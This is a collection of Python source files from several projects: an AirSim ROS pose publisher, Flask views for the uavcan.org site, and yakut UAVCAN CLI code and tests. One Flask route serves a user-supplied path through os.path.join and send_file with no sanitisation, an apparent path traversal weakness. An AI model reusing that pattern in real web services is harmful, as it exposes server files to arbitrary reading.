         irFolder='auto\\winter\\400ft\\45\\ir\\',
         sceneFolder='auto\\winter\\400ft\\45\\scene\\')
```
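The sample altitudes used above (`z=-122` and `z=-61`) are simply 400 ft and 200 ft converted to meters and negated per the NED convention described in the docstrings. A small sketch of that conversion; the helper name is made up for illustration:
```python
# NED: z grows downward, so an altitude above ground becomes a negative z value.
FT_TO_M = 0.3048

def ned_z_from_feet(altitude_ft: float) -> int:
    """Hypothetical helper: altitude in feet -> NED z in meters (rounded)."""
    return -round(altitude_ft * FT_TO_M)

assert ned_z_from_feet(400) == -122  # matches z=-122 used in the 400 ft calls
assert ned_z_from_feet(200) == -61   # matches z=-61 used in the 200 ft calls
```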
#### File: PythonClient/ros/car_pose.py
```python
import setup_path
import airsim
import rospy
import tf
from std_msgs.msg import String
from geometry_msgs.msg import PoseStamped
import time
def airpub():
pub = rospy.Publisher("airsimPose", PoseStamped, queue_size=1)
rospy.init_node('airpub', anonymous=True)
rate = rospy.Rate(10) # 10hz
# connect to the AirSim simulator
client = airsim.CarClient()
client.confirmConnection()
# start = time.time()
while not rospy.is_shutdown():
# get state of the car
car_state = client.getCarState()
pos = car_state.kinematics_estimated.position
orientation = car_state.kinematics_estimated.orientation
# milliseconds = (time.time() - start) * 1000
# populate PoseStamped ros message
simPose = PoseStamped()
simPose.pose.position.x = pos.x_val
simPose.pose.position.y = pos.y_val
simPose.pose.position.z = pos.z_val
simPose.pose.orientation.w = orientation.w_val
simPose.pose.orientation.x = orientation.x_val
simPose.pose.orientation.y = orientation.y_val
simPose.pose.orientation.z = orientation.z_val
simPose.header.stamp = rospy.Time.now()
simPose.header.seq = 1
simPose.header.frame_id = "simFrame"
# log PoseStamped message
rospy.loginfo(simPose)
#publish PoseStamped message
pub.publish(simPose)
# sleeps until next cycle
rate.sleep()
if __name__ == '__main__':
try:
airpub()
except rospy.ROSInterruptException:
pass
```
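A minimal companion sketch showing how the `airsimPose` topic published above might be consumed. It assumes a running ROS master and the standard `rospy`/`geometry_msgs` packages; the listener node name is arbitrary.
```python
# Hypothetical listener for the PoseStamped messages published by airpub() above.
import rospy
from geometry_msgs.msg import PoseStamped

def on_pose(msg: PoseStamped) -> None:
    # Log the position part of each received pose.
    rospy.loginfo("x=%.2f y=%.2f z=%.2f",
                  msg.pose.position.x, msg.pose.position.y, msg.pose.position.z)

if __name__ == '__main__':
    rospy.init_node('airsim_pose_listener', anonymous=True)
    rospy.Subscriber('airsimPose', PoseStamped, on_pose)
    rospy.spin()  # keep the node alive until shutdown
```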
|
{
"source": "jeyong/uavcan.org",
"score": 2
}
|
#### File: app/view/conformant_products.py
```python
from .. import app
from flask import render_template
from .home import TITLE
@app.route('/conformant-products')
def conformant_products():
return render_template('conformant-products.html',
title=TITLE)
```
#### File: app/view/consortium.py
```python
import os
from flask import render_template, send_file, abort
from .. import app
from .home import TITLE
from ..model import adopters
_CONSORTIUM_DIRECTORY_PATH = os.path.join(app.root_path, '..', 'consortium')
@app.route('/consortium')
def consortium():
adopter_list = list(adopters.get_list())
return render_template('consortium.html',
title=TITLE,
adopters=adopter_list)
@app.route('/consortium/<path:file_name>')
def _consortium_document(file_name):
try:
return send_file(os.path.join(_CONSORTIUM_DIRECTORY_PATH, file_name))
except FileNotFoundError:
return abort(404)
```
|
{
"source": "jeyong/yakut",
"score": 2
}
|
#### File: tests/cmd/interaction.py
```python
from __future__ import annotations
import time
import json
import typing
import pytest
import pyuavcan
import yakut
import yakut.yaml
from tests.subprocess import execute_cli, Subprocess
from tests.dsdl import OUTPUT_DIR
from tests.transport import TransportFactory
def _unittest_pub_sub_regular(transport_factory: TransportFactory, compiled_dsdl: typing.Any) -> None:
_ = compiled_dsdl
env = {
"YAKUT_TRANSPORT": transport_factory(None).expression,
"YAKUT_PATH": str(OUTPUT_DIR),
}
proc_sub_heartbeat = Subprocess.cli(
"--format=json",
"sub",
"uavcan.node.Heartbeat.1.0",
environment_variables=env,
)
proc_sub_diagnostic = Subprocess.cli(
"--format=json",
"sub",
"4321:uavcan.diagnostic.Record.1.1",
"--count=3",
environment_variables=env,
)
proc_sub_diagnostic_wrong_pid = Subprocess.cli(
"--format=yaml",
"sub",
"uavcan.diagnostic.Record.1.1",
"--count=3",
environment_variables=env,
)
proc_sub_temperature = Subprocess.cli(
"--format=json",
"sub",
"555:uavcan.si.sample.temperature.Scalar.1.0",
"--count=3",
"--no-metadata",
environment_variables=env,
)
time.sleep(1.0) # Time to let the background processes finish initialization
proc_pub = Subprocess.cli(
"-v",
"--heartbeat-vssc=54",
"--heartbeat-priority=high",
"--node-info",
"{software_image_crc: [0xdeadbeef]}",
f"--transport={transport_factory(51).expression}", # Takes precedence over the environment variable.
"pub",
"4321:uavcan.diagnostic.Record.1.1",
'{severity: {value: 6}, timestamp: {microsecond: 123456}, text: "Hello world!"}',
"1234:uavcan.diagnostic.Record.1.1",
'{text: "Goodbye world."}',
"555:uavcan.si.sample.temperature.Scalar.1.0",
"{kelvin: 123.456}",
"--count=3",
"--period=2",
"--priority=slow",
environment_variables=env,
)
time.sleep(2.0) # Time to let the publisher boot up properly.
# Request GetInfo from the publisher we just launched.
_, stdout, _ = execute_cli(
f"--transport={transport_factory(52).expression}",
f"--path={OUTPUT_DIR}",
"call",
"51",
"uavcan.node.GetInfo.1.0",
"--no-metadata",
"--timeout=5",
timeout=10.0,
)
parsed = yakut.yaml.Loader().load(stdout)
assert parsed[430]["protocol_version"] == {
"major": pyuavcan.UAVCAN_SPECIFICATION_VERSION[0],
"minor": pyuavcan.UAVCAN_SPECIFICATION_VERSION[1],
}
assert parsed[430]["software_version"] == {
"major": yakut.__version_info__[0],
"minor": yakut.__version_info__[1],
}
assert parsed[430]["software_image_crc"] == [0xDEADBEEF]
assert parsed[430]["name"] == "org.uavcan.yakut.publish"
proc_pub.wait(10.0)
time.sleep(1.0) # Time to sync up
# Parse the output from the subscribers and validate it.
out_sub_heartbeat = proc_sub_heartbeat.wait(1.0, interrupt=True)[1].splitlines()
out_sub_diagnostic = proc_sub_diagnostic.wait(1.0, interrupt=True)[1].splitlines()
out_sub_temperature = proc_sub_temperature.wait(1.0, interrupt=True)[1].splitlines()
heartbeats = list(map(json.loads, out_sub_heartbeat))
diagnostics = list(map(json.loads, out_sub_diagnostic))
temperatures = list(map(json.loads, out_sub_temperature))
print("heartbeats:", *heartbeats, sep="\n\t")
print("diagnostics:", *diagnostics, sep="\n\t")
print("temperatures:", *temperatures, sep="\n\t")
assert 1 <= len(heartbeats) <= 20
for m in heartbeats:
src_nid = m["7509"]["_metadata_"]["source_node_id"]
if src_nid == 51: # The publisher
assert "high" in m["7509"]["_metadata_"]["priority"].lower()
assert m["7509"]["_metadata_"]["transfer_id"] >= 0
assert m["7509"]["uptime"] in range(10)
assert m["7509"]["vendor_specific_status_code"] == 54
elif src_nid == 52: # The caller (GetInfo)
assert "nominal" in m["7509"]["_metadata_"]["priority"].lower()
assert m["7509"]["_metadata_"]["transfer_id"] >= 0
assert m["7509"]["uptime"] in range(4)
else:
assert False
assert len(diagnostics) == 3
for m in diagnostics:
assert "slow" in m["4321"]["_metadata_"]["priority"].lower()
assert m["4321"]["_metadata_"]["transfer_id"] >= 0
assert m["4321"]["_metadata_"]["source_node_id"] == 51
assert m["4321"]["timestamp"]["microsecond"] == 123456
assert m["4321"]["text"] == "Hello world!"
assert len(temperatures) == 3
assert all(map(lambda mt: mt["555"]["kelvin"] == pytest.approx(123.456), temperatures))
assert proc_sub_diagnostic_wrong_pid.alive
assert proc_sub_diagnostic_wrong_pid.wait(1.0, interrupt=True)[1].strip() == ""
def _unittest_slow_cli_pub_sub_anon(transport_factory: TransportFactory, compiled_dsdl: typing.Any) -> None:
_ = compiled_dsdl
env = {
"YAKUT_TRANSPORT": transport_factory(None).expression,
"YAKUT_PATH": str(OUTPUT_DIR),
}
proc_sub_heartbeat = Subprocess.cli(
"-v",
"--format=json",
"sub",
"uavcan.node.Heartbeat.1.0",
environment_variables=env,
)
proc_sub_diagnostic_with_meta = Subprocess.cli(
"-v",
"--format=json",
"sub",
"uavcan.diagnostic.Record.1.1",
environment_variables=env,
)
proc_sub_diagnostic_no_meta = Subprocess.cli(
"-v",
"--format=json",
"sub",
"uavcan.diagnostic.Record.1.1",
"--no-metadata",
environment_variables=env,
)
time.sleep(3.0) # Time to let the background processes finish initialization
if transport_factory(None).can_transmit:
proc = Subprocess.cli(
"pub",
"uavcan.diagnostic.Record.1.1",
"{}",
"--count=2",
"--period=2",
environment_variables=env,
)
proc.wait(timeout=8)
time.sleep(2.0) # Time to sync up
assert (
proc_sub_heartbeat.wait(1.0, interrupt=True)[1].strip() == ""
), "Anonymous nodes must not broadcast heartbeat"
diagnostics = list(
json.loads(s) for s in proc_sub_diagnostic_with_meta.wait(1.0, interrupt=True)[1].splitlines()
)
print("diagnostics:", diagnostics)
# Remember that anonymous transfers over redundant transports are NOT deduplicated.
# Hence, to support the case of redundant transports, we use 'greater or equal' here.
assert len(diagnostics) >= 2
for m in diagnostics:
assert "nominal" in m["8184"]["_metadata_"]["priority"].lower()
assert m["8184"]["_metadata_"]["transfer_id"] >= 0
assert m["8184"]["_metadata_"]["source_node_id"] is None
assert m["8184"]["timestamp"]["microsecond"] == 0
assert m["8184"]["text"] == ""
diagnostics = list(json.loads(s) for s in proc_sub_diagnostic_no_meta.wait(1.0, interrupt=True)[1].splitlines())
print("diagnostics:", diagnostics)
assert len(diagnostics) >= 2 # >= because see above
for m in diagnostics:
assert m["8184"]["timestamp"]["microsecond"] == 0
assert m["8184"]["text"] == ""
else:
proc = Subprocess.cli(
"-v",
"pub",
"uavcan.diagnostic.Record.1.1",
"{}",
"--count=2",
"--period=2",
environment_variables=env,
)
assert 0 < proc.wait(timeout=8, log=False)[0]
```
#### File: orchestrate/a_gnu/__init__.py
```python
import sys
import time
from pathlib import Path
import pytest
from yakut.cmd.orchestrate import exec_composition, load_composition, Stack, Context, ErrorCode, exec_file, load_ast
from .... import ROOT_DIR
if sys.platform.startswith("win"): # pragma: no cover
pytest.skip("These are GNU/Linux-only tests", allow_module_level=True)
def _std_reset() -> None:
if sys.stdout.seekable():
sys.stdout.seek(0)
sys.stdout.truncate(0)
if sys.stderr.seekable():
sys.stderr.seek(0)
sys.stderr.truncate(0)
def _std_flush() -> None:
sys.stdout.flush()
sys.stderr.flush()
def _unittest_a(stdout_file: Path, stderr_file: Path) -> None:
_ = stdout_file, stderr_file
ast = load_ast((Path(__file__).parent / "a.orc.yaml").read_text())
comp = load_composition(ast, {"C": b"DEF", "D": b"this variable will be unset"})
print(comp)
ctx = Context(lookup_paths=[])
# Regular test, runs until completion.
_std_reset()
started_at = time.monotonic()
assert 100 == exec_composition(ctx, comp, gate=_true, stack=Stack())
elapsed = time.monotonic() - started_at
assert 10 <= elapsed <= 15, "Parallel execution is not handled correctly."
_std_flush()
sys.stdout.seek(0)
assert sys.stdout.read().splitlines() == [
"100 abc DEF",
"finalizer",
"a.d.e: 1 2 3",
]
sys.stderr.seek(0)
assert "text value\n" in sys.stderr.read()
# Interrupted five seconds in.
_std_reset()
started_at = time.monotonic()
assert 0 != exec_composition(ctx, comp, gate=lambda: time.monotonic() - started_at < 5.0, stack=Stack())
elapsed = time.monotonic() - started_at
assert 5 <= elapsed <= 9, "Interruption is not handled correctly."
_std_flush()
sys.stdout.seek(0)
assert sys.stdout.read().splitlines() == [
"100 abc DEF",
]
sys.stderr.seek(0)
assert "text value\n" in sys.stderr.read()
# Refers to a non-existent file.
comp = load_composition(ast, {"CRASH": b"1"})
print(comp)
assert ErrorCode.FILE_ERROR == exec_composition(ctx, comp, gate=_true, stack=Stack())
def _unittest_b(stdout_file: Path) -> None:
_ = stdout_file
ctx = Context(lookup_paths=[ROOT_DIR, Path(__file__).parent])
_std_reset()
env = {"PROCEED_B": b"1"}
assert 0 == exec_file(ctx, "b.orc.yaml", env, gate=_true)
_std_flush()
sys.stdout.seek(0)
assert sys.stdout.read().splitlines() == [
"main b",
"123",
"456",
"finalizer b",
"finalizer b 1",
]
assert env == {
"PROCEED_B": b"1",
"FOO": b"123",
"BAR": b"123",
}
_std_reset()
env = {}
assert 0 == exec_file(ctx, str((Path(__file__).parent / "b.orc.yaml").absolute()), env, gate=_true)
_std_flush()
sys.stdout.seek(0)
assert sys.stdout.read().splitlines() == [
"finalizer b",
]
assert env == {
"FOO": b"123",
"BAR": b"123",
}
_std_reset()
env = {"PLEASE_FAIL": b"1"}
assert 0 == exec_file(ctx, "b.orc.yaml", env, gate=_true)
_std_flush()
sys.stdout.seek(0)
assert sys.stdout.read().splitlines() == [
"finalizer b",
]
assert env == {
"PLEASE_FAIL": b"1",
"FOO": b"123",
"BAR": b"123",
}
_std_reset()
env = {"PROCEED_B": b"1", "PLEASE_FAIL": b"1"}
assert 42 == exec_file(ctx, "b.orc.yaml", env, gate=_true)
_std_flush()
sys.stdout.seek(0)
assert sys.stdout.read().splitlines() == [
"main b",
"123",
"456",
"finalizer b",
"finalizer b 1",
]
assert env == {
"PROCEED_B": b"1",
"PLEASE_FAIL": b"1",
"FOO": b"123",
"BAR": b"123",
}
ctx = Context(lookup_paths=[])
assert ErrorCode.FILE_ERROR == exec_file(ctx, "b.orc.yaml", {"PROCEED_B": b"1"}, gate=_true)
ctx = Context(lookup_paths=[Path(__file__).parent])
assert ErrorCode.FILE_ERROR == exec_file(ctx, "b.orc.yaml", {"PROCEED_B": b"1"}, gate=_true)
ctx = Context(lookup_paths=[])
assert ErrorCode.FILE_ERROR == exec_file(ctx, "b.orc.yaml", {}, gate=_true)
def _true() -> bool:
return True
```
#### File: tests/deps/sitecustomize.py
```python
import os
import sys
import pathlib
ROOT_DIR = pathlib.Path(__file__).resolve().parent.parent.parent
SETUP_CFG = ROOT_DIR / "setup.cfg"
assert SETUP_CFG.is_file()
def detect_debugger() -> bool:
if sys.gettrace() is not None:
return True
if (os.path.sep + "pydev") in sys.argv[0]:
return True
return False
def setup_coverage() -> None:
try:
import coverage # The module may be missing during early stage setup, no need to abort everything.
except ImportError as ex:
pass
else:
# Coverage configuration; see https://coverage.readthedocs.io/en/coverage-4.2/subprocess.html
os.environ["COVERAGE_PROCESS_START"] = str(SETUP_CFG)
coverage.process_startup()
if not detect_debugger():
setup_coverage()
```
#### File: yakut/cmd/call.py
```python
import sys
import typing
import decimal
import contextlib
import click
import pyuavcan
import yakut
from yakut.helpers import EnumParam
from yakut.param.formatter import Formatter
from yakut.util import convert_transfer_metadata_to_builtin, construct_port_id_and_type
_S = typing.TypeVar("_S", bound=pyuavcan.dsdl.ServiceObject)
_logger = yakut.get_logger(__name__)
def _validate_request_fields(ctx: click.Context, param: click.Parameter, value: str) -> typing.Any:
from yakut.yaml import EvaluableLoader
eval_context: typing.Dict[str, typing.Any] = {} # Add useful members later.
try:
fields = EvaluableLoader(eval_context).load(value)
except Exception as ex:
raise click.BadParameter(f"Could not parse the request object fields: {ex}", ctx=ctx, param=param)
return fields
@yakut.subcommand()
@click.argument("server_node_id", metavar="SERVER_NODE_ID", type=int, required=True)
@click.argument("service", metavar="SERVICE", type=str, required=True)
@click.argument("request_fields", metavar="FIELDS", type=str, callback=_validate_request_fields, default="{}")
@click.option(
"--timeout",
"-T",
type=float,
default=pyuavcan.presentation.DEFAULT_SERVICE_REQUEST_TIMEOUT,
show_default=True,
metavar="SECONDS",
help=f"Request timeout; how long to wait for the response before giving up.",
)
@click.option(
"--priority",
"-P",
default=pyuavcan.presentation.DEFAULT_PRIORITY,
type=EnumParam(pyuavcan.transport.Priority),
help=f"Priority of the request transfer. [default: {pyuavcan.presentation.DEFAULT_PRIORITY.name}]",
)
@click.option(
"--with-metadata/--no-metadata",
"+M/-M",
default=False,
show_default=True,
help="When enabled, the response object is prepended with an extra field named `_metadata_`.",
)
@yakut.pass_purser
def call(
purser: yakut.Purser,
server_node_id: int,
service: str,
request_fields: typing.Any,
timeout: float,
priority: pyuavcan.transport.Priority,
with_metadata: bool,
) -> None:
"""
Invoke an RPC-service using the specified request object and print the response.
Unless the local transport is configured in anonymous node,
while waiting for the response the local node will also publish on standard subjects like
Heartbeat and provide some standard RPC-services like GetInfo.
The first positional argument is the server node-ID.
The second is the pair of service-ID (which can be omitted if a fixed one is defined for the type)
and the data type name of the form:
\b
[SERVICE_ID:]FULL_SERVICE_TYPE_NAME.MAJOR.MINOR
In the data type name, forward or backward slashes can be used instead of ".";
version numbers can be also separated using underscores.
This is done to allow the user to rely on filesystem autocompletion when typing the command.
The third positional argument specifies the values of the request object fields in YAML format
(or JSON, which is a subset of YAML).
Missing fields will be left at their default values.
If omitted, this argument defaults to an empty object: `{}`.
For more info about the format see PyUAVCAN documentation on builtin-based representations.
The output will be printed as a key-value mapping of one element where the key is the service-ID
and the value is the received response object.
Examples:
\b
yakut call 42 uavcan.node.GetInfo.1.0 +M -T3 -Pe
yakut call 42 123:sirius_cyber_corp.PerformLinearLeastSquaresFit.1.0 'points: [{x: 10, y: 1}, {x: 20, y: 2}]'
"""
try:
from pyuavcan.application import Node
except ImportError as ex:
from yakut.cmd.compile import make_usage_suggestion
raise click.UsageError(make_usage_suggestion(ex.name))
_logger.debug(
"server_node_id=%s, service=%r, request_fields=%r, timeout=%.6f, priority=%s, with_metadata=%s",
server_node_id,
service,
request_fields,
timeout,
priority,
with_metadata,
)
service_id, dtype = construct_port_id_and_type(service)
if not issubclass(dtype, pyuavcan.dsdl.ServiceObject):
raise TypeError(f"Expected a service type; got {dtype.__name__}")
request = pyuavcan.dsdl.update_from_builtin(dtype.Request(), request_fields)
_logger.info("Request object: %r", request)
formatter = purser.make_formatter()
node = purser.get_node("call", allow_anonymous=False)
assert isinstance(node, Node) and callable(formatter)
with contextlib.closing(node):
client = node.presentation.make_client(dtype, service_id, server_node_id)
client.response_timeout = timeout
client.priority = priority
node.start()
_run(client, request, formatter, with_metadata=with_metadata)
@yakut.asynchronous
async def _run(
client: pyuavcan.presentation.Client[_S],
request: pyuavcan.dsdl.CompositeObject,
formatter: Formatter,
with_metadata: bool,
) -> None:
request_ts_transport: typing.Optional[pyuavcan.transport.Timestamp] = None
def on_transfer_feedback(fb: pyuavcan.transport.Feedback) -> None:
nonlocal request_ts_transport
request_ts_transport = fb.first_frame_transmission_timestamp
client.output_transport_session.enable_feedback(on_transfer_feedback)
request_ts_application = pyuavcan.transport.Timestamp.now()
result = await client.call(request)
response_ts_application = pyuavcan.transport.Timestamp.now()
if result is None:
click.secho(f"The request has timed out after {client.response_timeout:0.1f} seconds", err=True, fg="red")
sys.exit(1)
if not request_ts_transport: # pragma: no cover
request_ts_transport = request_ts_application
_logger.warning(
"The transport implementation is misbehaving: feedback was never emitted; "
"falling back to software timestamping. "
"Please submit a bug report. Involved instances: client=%r, result=%r",
client,
result,
)
response, transfer = result
transport_duration = transfer.timestamp.monotonic - request_ts_transport.monotonic
application_duration = response_ts_application.monotonic - request_ts_application.monotonic
_logger.info(
"Request duration [second]: "
"transport layer: %.6f, application layer: %.6f, application layer overhead: %.6f",
transport_duration,
application_duration,
application_duration - transport_duration,
)
bi: typing.Dict[str, typing.Any] = {} # We use updates to ensure proper dict ordering: metadata before data
if with_metadata:
qnt = decimal.Decimal("0.000001")
bi.update(
convert_transfer_metadata_to_builtin(
transfer,
roundtrip_time={
"transport_layer": (transfer.timestamp.monotonic - request_ts_transport.monotonic).quantize(qnt),
"application_layer": application_duration.quantize(qnt),
},
)
)
bi.update(pyuavcan.dsdl.to_builtin(response))
print(formatter({client.port_id: bi}))
```
#### File: yakut/cmd/documentation.py
```python
import sys
import typing
import click
import yakut
_logger = yakut.get_logger(__name__)
@yakut.subcommand()
@click.argument("name", default="")
def documentation(name: str) -> None:
"""
Show transport usage documentation from PyUAVCAN.
Transports whose dependencies are not installed will not be shown.
If the argument NAME is provided, the documentation will be shown only for entities whose name contains
the specified string (case-insensitive), like "udp".
Full documentation is available at https://pyuavcan.readthedocs.io
"""
import pydoc
import pyuavcan
fill_width = click.get_terminal_size()[0] - 1
# noinspection PyTypeChecker
pyuavcan.util.import_submodules(pyuavcan.transport, error_handler=_handle_import_error)
transport_base = pyuavcan.transport.Transport
texts: typing.List[str] = []
for cls in pyuavcan.util.iter_descendants(transport_base):
if not cls.__name__.startswith("_") and cls is not transport_base:
public_module = cls.__module__.split("._")[0]
public_name = public_module + "." + cls.__name__
if name.lower() in public_name.lower():
texts.append(
"\n".join(
[
"-" * fill_width,
public_name.center(fill_width, " "),
"-" * fill_width,
cls.__doc__,
pydoc.text.document(cls.__init__),
"",
]
)
)
if texts:
click.echo_via_pager(texts)
else:
click.secho(f"There are no entries that match {name!r}", err=True, fg="red")
sys.exit(1)
def _handle_import_error(name: str, ex: ImportError) -> None:
_logger.info("Transport module %r is not available because: %r", name, ex)
```
#### File: cmd/file_server/_cmd.py
```python
from __future__ import annotations
import asyncio
from typing import Optional, Iterable, List, Tuple, TYPE_CHECKING
from pathlib import Path
import click
import pyuavcan
import yakut
from . import AppDescriptor
if TYPE_CHECKING:
import pyuavcan.application # pylint: disable=ungrouped-imports
import pyuavcan.application.file # pylint: disable=ungrouped-imports
_logger = yakut.get_logger(__name__)
def _validate_root_directory(ctx: click.Context, param: click.Parameter, value: Iterable[str]) -> List[Path]:
_ = param
out: List[Path] = []
for x in value:
p = Path(x).resolve()
if not p.is_dir() or not p.exists():
raise click.UsageError(f"The specified root is not a valid directory: {x!r}", ctx=ctx)
out.append(p)
if not out:
out.append(Path.cwd().resolve()) # This is the default.
_logger.info("File server root directories: %r", list(map(str, out)))
return out
@yakut.subcommand()
@click.argument(
"roots",
metavar="PATH",
type=click.Path(exists=True, file_okay=False, resolve_path=True, path_type=str),
callback=_validate_root_directory,
nargs=-1,
)
@click.option(
"--plug-and-play",
"-P",
metavar="FILE",
type=click.Path(dir_okay=False, resolve_path=True, path_type=str),
help=f"""
Run a centralized plug-and-play (PnP) node-ID allocator alongside the file server.
The file path points to the allocation table; if missing, a new file will be created.
The PnP allocator will be tracking the status of nodes and requesting uavcan.node.GetInfo automatically.
Low-level implementation details are available in the documentation for pyuavcan.application.plug_and_play
at https://pyuavcan.readthedocs.io.
""",
)
@click.option(
"--update-software/--no-update-software",
"+U/-U",
default=False,
show_default=True,
help=f"""
Check if all online nodes are running up-to-date software; request update if not.
The software version is determined by invoking uavcan.node.GetInfo for every node that is online or
became online (or restarted).
When a node responds to uavcan.node.GetInfo, the root directory of the file server is scanned for software packages
that are suitable for the node.
If the node is already executing one of the available software packages or no suitable packages are found,
no further action is taken, as it is considered to be up-to-date.
Otherwise, if it is determined that the node should be updated, a standard software update request
of type uavcan.node.ExecuteCommand with COMMAND_BEGIN_SOFTWARE_UPDATE is sent.
To be considered by the server, node software packages shall reside in one of the root directories and
be named following this pattern:
\b
NAME-HWMAJ.HWMIN-SWMAJ.SWMIN.VCS.CRC.app*
    where the hardware-version part and the trailing VCS/CRC fields are optional, as explained below.
The values are sourced from uavcan.node.GetInfo, and they are as follows:
NAME -- The name of the node; e.g., "com.zubax.telega".
HWMAJ, HWMIN -- Hardware version numbers.
The minor number or both of them can be omitted iff the package is compatible with multiple hardware revisions.
SWMAJ, SWMIN -- Software version numbers.
VCS, CRC --
The version control system (VCS) revision ID (e.g., git commit hash) and the CRC of the software package.
Both are hexadecimal numbers and both are optional: either the CRC alone or both VCS-hash and CRC can be omitted.
The fields are terminated by a literal string ".app",
which can be followed by arbitrary additional metadata (like a file extension).
Examples of compliant names:
\b
com.zubax.telega-1.2-0.3.68620b82.28df0c432c2718cd.app.bin
com.zubax.telega-0.3.app.zip
A node running software version X (as determined from uavcan.node.GetInfo)
is considered to require an update to Y (a local package file) if
the names are matching, the hardware version is compatible, and either condition holds:
- The software image CRC is defined for both X and Y and is different.
- The software version of Y is higher than X.
- The software version of Y is not older than X and the VCS hash is different.
- There may be additional heuristics to handle edge cases. Inspect logs or use --verbose to see details.
""",
)
@yakut.pass_purser
def file_server(purser: yakut.Purser, roots: List[Path], plug_and_play: Optional[str], update_software: bool) -> None:
"""
Run a standard UAVCAN file server; optionally run a plug-and-play node-ID allocator and software updater.
The command takes a list of root directories for the file server.
If none are given, the current working directory will be used as the only root.
If more than one root is given, they all will be visible via UAVCAN as a single unified directory;
the first directory takes precedence in case of conflicting entries.
Examples:
\b
yakut file-server --plug-and-play=allocation_table.db --update-software
"""
try:
from pyuavcan.application import NodeInfo
from pyuavcan.application.file import FileServer
from pyuavcan.application.node_tracker import NodeTracker, Entry
from uavcan.node import ExecuteCommand_1_1 as ExecuteCommand
from uavcan.node import Heartbeat_1_0 as Heartbeat
except ImportError as ex:
from yakut.cmd.compile import make_usage_suggestion
raise click.UsageError(make_usage_suggestion(ex.name))
with purser.get_node("file_server", allow_anonymous=False) as node:
node_tracker: Optional[NodeTracker] = None # Initialized lazily only if needed.
def get_node_tracker() -> NodeTracker:
nonlocal node_tracker
if node_tracker is None:
_logger.info("Initializing the node tracker")
node_tracker = NodeTracker(node)
return node_tracker
if plug_and_play:
_logger.info("Starting a plug-and-play allocator using file %r", plug_and_play)
from pyuavcan.application.plug_and_play import CentralizedAllocator
alloc = CentralizedAllocator(node, plug_and_play)
# The allocator requires integration with the node tracker, as explained in the docs.
def register_node(node_id: int, _old_entry: Optional[Entry], entry: Optional[Entry]) -> None:
if entry:
_logger.info("Node %r most recent heartbeat: %s", node_id, entry.heartbeat)
_logger.info("Node %r info: %s", node_id, entry.info or "<not available>")
else:
_logger.info("Node %r went offline", node_id)
unique_id = entry.info.unique_id.tobytes() if entry and entry.info else None
alloc.register_node(node_id, unique_id)
get_node_tracker().add_update_handler(register_node)
fs = FileServer(node, roots)
def check_software_update(node_id: int, _old_entry: Optional[Entry], entry: Optional[Entry]) -> None:
if entry is None or entry.info is None:
_logger.debug("Info for node %r is not (yet) available, cannot check software version", node_id)
return
heartbeat = entry.heartbeat
assert isinstance(heartbeat, Heartbeat)
if heartbeat.mode.value == heartbeat.mode.SOFTWARE_UPDATE:
_logger.info("Node %r is in the software update mode already: %r", node_id, heartbeat)
return
_logger.info("Checking if node %r requires a software update...", node_id)
info = entry.info
assert isinstance(info, NodeInfo)
package = _locate_package(fs, info)
if package:
_local_root_is_irrelevant, remote_visible_path = package
cmd_request = ExecuteCommand.Request(
ExecuteCommand.Request.COMMAND_BEGIN_SOFTWARE_UPDATE,
str(remote_visible_path),
)
_logger.warning("Requesting node %r to update its software: %r", node_id, cmd_request)
cmd_client = node.make_client(ExecuteCommand, node_id)
cmd_client.priority = pyuavcan.transport.Priority.SLOW
cmd_client.response_timeout = 5.0
async def do_call() -> None:
result = await cmd_client.call(cmd_request)
if result is None:
_logger.error(
"Node %r did not respond to software update command %r in %.1f seconds",
node_id,
cmd_request,
cmd_client.response_timeout,
)
return
response, _ = result
assert isinstance(response, ExecuteCommand.Response)
if response.status != 0:
_logger.error(
"Node %r responded to software update command %r with error %r",
node_id,
cmd_request,
response.status,
)
return
_logger.info("Node %r confirmed software update command %r", node_id, cmd_request)
node.loop.create_task(do_call())
else:
_logger.info("Node %r does not require a software update.", node_id)
if update_software:
_logger.info("Initializing the software update checker")
            # The check should be run in a separate thread: on a system with slow or busy disk IO,
            # blocking the event loop on disk reads here would slow the file server down significantly.
get_node_tracker().add_update_handler(check_software_update)
asyncio.get_event_loop().run_forever()
def _locate_package(
fs: pyuavcan.application.file.FileServer,
info: pyuavcan.application.NodeInfo,
) -> Optional[Tuple[Path, Path]]:
"""
If at least one locally available application file is equivalent to the already running application,
no update will take place.
This is to support the case where the network may contain nodes running several different versions
of the application.
Also, without this capability, if the lookup roots contained more than one application package for a
given node, they would be continuously replacing one another.
"""
app = AppDescriptor.from_node_info(info)
result: Optional[Tuple[Path, Path]] = None
for root, tail in fs.glob(app.make_glob_expression()):
candidate = AppDescriptor.from_file_name(str(tail.name))
if candidate:
if app.is_equivalent(candidate):
return None
if app.should_update_to(candidate):
result = root, tail
return result
```
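The `--update-software` help text above states the rules for deciding whether a node should be updated once a name- and hardware-compatible package has been found. A standalone sketch of those rules, using a hypothetical `Version` dataclass and `should_update()` helper rather than the real `AppDescriptor` API:
```python
# Standalone sketch of the update-decision rules from the --update-software help text.
# Assumes the name/hardware compatibility checks already passed; Version and should_update()
# are hypothetical illustrations, not the AppDescriptor API used by the command above.
from dataclasses import dataclass
from typing import Optional

@dataclass
class Version:
    major: int
    minor: int
    vcs: Optional[int] = None  # VCS revision ID (e.g., git hash), if known
    crc: Optional[int] = None  # software image CRC, if known

def should_update(running: Version, candidate: Version) -> bool:
    """True if the local package `candidate` should replace the node's `running` software."""
    # The software image CRC is defined for both and is different.
    if running.crc is not None and candidate.crc is not None and running.crc != candidate.crc:
        return True
    # The candidate version is strictly higher.
    if (candidate.major, candidate.minor) > (running.major, running.minor):
        return True
    # The candidate is not older and the VCS hash is different.
    if (candidate.major, candidate.minor) >= (running.major, running.minor) and \
            candidate.vcs is not None and candidate.vcs != running.vcs:
        return True
    return False

assert should_update(Version(1, 0), Version(1, 1))                    # newer version
assert not should_update(Version(1, 1), Version(1, 0))                # older version
assert should_update(Version(1, 0, vcs=0xA), Version(1, 0, vcs=0xB))  # same version, new VCS hash
```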
#### File: cmd/monitor/_view.py
```python
from __future__ import annotations
import sys
import functools
from typing import TYPE_CHECKING, Optional, Dict, Callable, List, Any, Set, AbstractSet, Tuple, TypeVar
from collections import defaultdict
import pyuavcan
import yakut
from ._model import N_NODES, N_SUBJECTS, N_SERVICES, NodeState
from ._ui import Style, Color, Canvas, TableRenderer
if TYPE_CHECKING:
from numpy import matrix
from scipy.sparse import spmatrix
import uavcan.node
S_DEFAULT = Style(fg=Color.WHITE, salience=1)
S_FAILURE = Style(fg=Color.WHITE, bg=Color.RED, salience=2)
S_MUTED = Style(salience=-1)
